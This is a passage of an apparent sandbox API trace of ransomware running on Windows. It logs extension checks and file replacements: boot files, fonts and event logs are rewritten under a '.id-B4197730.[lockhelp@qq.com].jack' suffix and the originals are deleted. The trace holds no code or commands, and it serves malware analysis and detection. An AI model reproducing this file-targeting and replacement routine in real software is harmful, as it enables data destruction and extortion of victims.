-1 [0205.315] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.315] lstrlenW (lpString=".dbf") returned 4 [0205.315] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0205.315] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.315] lstrlenW (lpString=".1cd") returned 4 [0205.315] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0205.315] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0205.315] lstrlenW (lpString=".jpg") returned 4 [0205.315] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0205.315] lstrcmpiW (lpString1=".mui", lpString2=".jack") returned 1 [0205.315] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0205.315] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.316] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=77664) returned 1 [0205.316] CloseHandle (hObject=0x40c) returned 1 [0205.316] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0205.316] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.316] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.316] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.316] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.316] lstrlenW (lpString=".doc") returned 4 [0205.316] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0205.316] lstrlenW (lpString=".docx") returned 5 [0205.316] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0205.317] lstrlenW (lpString=".pdf") returned 4 [0205.317] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0205.317] lstrlenW (lpString=".xls") returned 4 [0205.317] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0205.317] lstrlenW (lpString=".xlsx") returned 5 [0205.317] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0205.317] lstrlenW (lpString=".ppt") returned 4 [0205.317] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0205.317] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.317] lstrlenW (lpString=".zip") returned 4 [0205.317] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0205.317] lstrlenW (lpString=".rar") returned 4 [0205.317] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0205.317] lstrlenW (lpString=".bz2") returned 4 [0205.317] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0205.317] lstrlenW (lpString=".7z") returned 3 [0205.317] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0205.317] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.317] lstrlenW (lpString=".dbf") returned 4 [0205.317] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0205.317] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.317] lstrlenW (lpString=".1cd") returned 4 [0205.317] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0205.317] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.317] lstrlenW (lpString=".jpg") returned 4 [0205.317] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0205.317] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.318] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.318] lstrlenW (lpString=".doc") returned 4 [0205.318] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0205.318] lstrlenW (lpString=".docx") returned 5 [0205.318] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0205.318] lstrlenW (lpString=".pdf") returned 4 [0205.318] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0205.318] lstrlenW (lpString=".xls") returned 4 [0205.318] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0205.318] lstrlenW (lpString=".xlsx") returned 5 [0205.318] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0205.318] lstrlenW (lpString=".ppt") returned 4 [0205.318] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0205.318] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.318] lstrlenW (lpString=".zip") returned 4 [0205.318] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0205.318] lstrlenW (lpString=".rar") returned 4 [0205.318] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0205.318] lstrlenW (lpString=".bz2") returned 4 [0205.318] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0205.318] lstrlenW (lpString=".7z") returned 3 [0205.318] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0205.318] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.318] lstrlenW (lpString=".dbf") returned 4 [0205.318] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0205.318] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.318] lstrlenW (lpString=".1cd") returned 4 [0205.318] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0205.318] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0205.319] lstrlenW (lpString=".jpg") returned 4 [0205.319] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0205.319] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0205.319] lstrlenW (lpString="bootspaces.dll") returned 14 [0205.319] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.320] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=95648) returned 1 [0205.320] CloseHandle (hObject=0x40c) returned 1 [0205.320] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll")) returned 0x20 [0205.320] GetFileAttributesW (lpFileName="C:\\Boot\\bootspaces.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\bootspaces.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.320] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.321] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.321] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.321] lstrlenW (lpString=".doc") returned 4 [0205.321] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0205.321] lstrlenW (lpString=".docx") returned 5 [0205.321] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0205.321] lstrlenW (lpString=".pdf") returned 4 [0205.321] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0205.321] lstrlenW (lpString=".xls") returned 4 [0205.321] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0205.321] lstrlenW (lpString=".xlsx") returned 5 [0205.321] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0205.321] lstrlenW (lpString=".ppt") returned 4 [0205.321] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0205.321] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.321] lstrlenW (lpString=".zip") returned 4 [0205.321] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0205.321] lstrlenW (lpString=".rar") returned 4 [0205.321] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0205.321] lstrlenW (lpString=".bz2") returned 4 [0205.321] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0205.321] lstrlenW (lpString=".7z") returned 3 [0205.321] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0205.321] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.321] lstrlenW (lpString=".dbf") returned 4 [0205.321] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0205.321] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.321] lstrlenW (lpString=".1cd") returned 4 [0205.321] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0205.322] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.322] lstrlenW (lpString=".jpg") returned 4 [0205.322] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0205.322] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.322] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.322] lstrlenW (lpString=".doc") returned 4 [0205.322] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0205.322] lstrlenW (lpString=".docx") returned 5 [0205.322] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0205.322] lstrlenW (lpString=".pdf") returned 4 [0205.322] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0205.322] lstrlenW (lpString=".xls") returned 4 [0205.322] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0205.322] lstrlenW (lpString=".xlsx") returned 5 [0205.322] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0205.322] lstrlenW (lpString=".ppt") returned 4 [0205.322] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0205.322] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.322] lstrlenW (lpString=".zip") returned 4 [0205.322] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0205.322] lstrlenW (lpString=".rar") returned 4 [0205.322] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0205.322] lstrlenW (lpString=".bz2") returned 4 [0205.322] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0205.322] lstrlenW (lpString=".7z") returned 3 [0205.322] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0205.322] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.322] lstrlenW (lpString=".dbf") returned 4 [0205.323] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0205.323] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.323] lstrlenW (lpString=".1cd") returned 4 [0205.323] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0205.323] lstrlenW (lpString="C:\\Boot\\bootspaces.dll") returned 22 [0205.323] lstrlenW (lpString=".jpg") returned 4 [0205.323] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0205.323] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0205.323] lstrlenW (lpString="bootvhd.dll") returned 11 [0205.323] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.323] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=99744) returned 1 [0205.323] CloseHandle (hObject=0x40c) returned 1 [0205.323] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll")) returned 0x20 [0205.324] GetFileAttributesW (lpFileName="C:\\Boot\\bootvhd.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\bootvhd.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.324] CreateFileW (lpFileName="C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.324] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0205.324] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0205.324] lstrlenW (lpString=".doc") returned 4 [0205.324] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0205.324] lstrlenW (lpString=".docx") returned 5 [0205.324] lstrcmpiW (lpString1=".docx", lpString2="d.dll") returned -1 [0205.324] lstrlenW (lpString=".pdf") returned 4 [0205.324] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0205.324] lstrlenW (lpString=".xls") returned 4 [0205.324] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0205.324] lstrlenW (lpString=".xlsx") returned 5 [0205.324] lstrcmpiW (lpString1=".xlsx", lpString2="d.dll") returned -1 [0205.324] lstrlenW (lpString=".ppt") returned 4 [0205.324] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0205.324] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0205.324] lstrlenW (lpString=".zip") returned 4 [0205.324] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0205.324] lstrlenW (lpString=".rar") returned 4 [0205.324] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0205.324] lstrlenW (lpString=".bz2") returned 4 [0205.324] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0205.324] lstrlenW (lpString=".7z") returned 3 [0205.325] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0205.325] lstrlenW (lpString="C:\\Boot\\bootvhd.dll") returned 19 [0205.325] lstrlenW (lpString=".dbf") returned 4 [0205.325] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0205.332] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0 [0205.333] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0 [0205.336] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0 [0205.337] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0 [0205.526] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.526] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.526] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\internet explorer.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.526] GetLastError () returned 0x0 [0205.526] ReadFile (in: hFile=0x40c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.531] WriteFile (in: hFile=0x438, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.533] ReadFile (in: hFile=0x40c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.533] WriteFile (in: hFile=0x438, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x100, lpOverlapped=0x0) returned 1 [0205.534] SetEndOfFile (hFile=0x438) returned 1 [0205.534] CloseHandle (hObject=0x438) returned 1 [0205.535] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.536] SetEndOfFile (hFile=0x40c) returned 1 [0205.537] CloseHandle (hObject=0x40c) returned 1 [0205.537] SetFileAttributesW (lpFileName="C:\\Logs\\Internet Explorer.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.537] DeleteFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx")) returned 1 [0205.537] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.537] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.537] lstrlenW (lpString=".doc") returned 4 [0205.537] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString=".docx") returned 5 [0205.538] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.538] lstrlenW (lpString=".pdf") returned 4 [0205.538] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString=".xls") returned 4 [0205.538] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString=".xlsx") returned 5 [0205.538] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.538] lstrlenW (lpString=".ppt") returned 4 [0205.538] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.538] lstrlenW (lpString=".zip") returned 4 [0205.538] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString=".rar") returned 4 [0205.538] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString=".bz2") returned 4 [0205.538] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString=".7z") returned 3 [0205.538] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.538] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.538] lstrlenW (lpString=".dbf") returned 4 [0205.538] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.538] lstrlenW (lpString=".1cd") returned 4 [0205.538] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.538] lstrlenW (lpString=".jpg") returned 4 [0205.538] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.538] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.538] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.538] lstrlenW (lpString=".doc") returned 4 [0205.539] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.539] lstrlenW (lpString=".docx") returned 5 [0205.539] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.539] lstrlenW (lpString=".pdf") returned 4 [0205.539] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.539] lstrlenW (lpString=".xls") returned 4 [0205.539] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.539] lstrlenW (lpString=".xlsx") returned 5 [0205.539] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.539] lstrlenW (lpString=".ppt") returned 4 [0205.539] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.539] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.539] lstrlenW (lpString=".zip") returned 4 [0205.539] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.539] lstrlenW (lpString=".rar") returned 4 [0205.539] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.539] lstrlenW (lpString=".bz2") returned 4 [0205.539] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.539] lstrlenW (lpString=".7z") returned 3 [0205.539] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.539] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.539] lstrlenW (lpString=".dbf") returned 4 [0205.539] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.539] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.539] lstrlenW (lpString=".1cd") returned 4 [0205.539] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.539] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0205.539] lstrlenW (lpString=".jpg") returned 4 [0205.539] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.540] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.540] lstrlenW (lpString="Key Management Service.evtx") returned 27 [0205.540] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.540] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0205.540] CloseHandle (hObject=0x40c) returned 1 [0205.540] GetFileAttributesW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx")) returned 0x20 [0205.540] GetFileAttributesW (lpFileName="C:\\Logs\\Key Management Service.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\key management service.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.540] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.540] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.540] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.540] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\key management service.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.541] GetLastError () returned 0x0 [0205.541] ReadFile (in: hFile=0x40c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.581] WriteFile (in: hFile=0x438, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.582] ReadFile (in: hFile=0x40c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.582] WriteFile (in: hFile=0x438, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x10a, lpOverlapped=0x0) returned 1 [0205.582] SetEndOfFile (hFile=0x438) returned 1 [0205.583] CloseHandle (hObject=0x438) returned 1 [0205.584] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.584] SetEndOfFile (hFile=0x40c) returned 1 [0205.585] CloseHandle (hObject=0x40c) returned 1 [0205.585] SetFileAttributesW (lpFileName="C:\\Logs\\Key Management Service.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.586] DeleteFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx")) returned 1 [0205.590] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.590] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.590] lstrlenW (lpString=".doc") returned 4 [0205.590] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.590] lstrlenW (lpString=".docx") returned 5 [0205.590] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.590] lstrlenW (lpString=".pdf") returned 4 [0205.590] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.590] lstrlenW (lpString=".xls") returned 4 [0205.590] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.590] lstrlenW (lpString=".xlsx") returned 5 [0205.591] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.591] lstrlenW (lpString=".ppt") returned 4 [0205.591] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.591] lstrlenW (lpString=".zip") returned 4 [0205.591] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString=".rar") returned 4 [0205.591] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString=".bz2") returned 4 [0205.591] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString=".7z") returned 3 [0205.591] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.591] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.591] lstrlenW (lpString=".dbf") returned 4 [0205.591] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 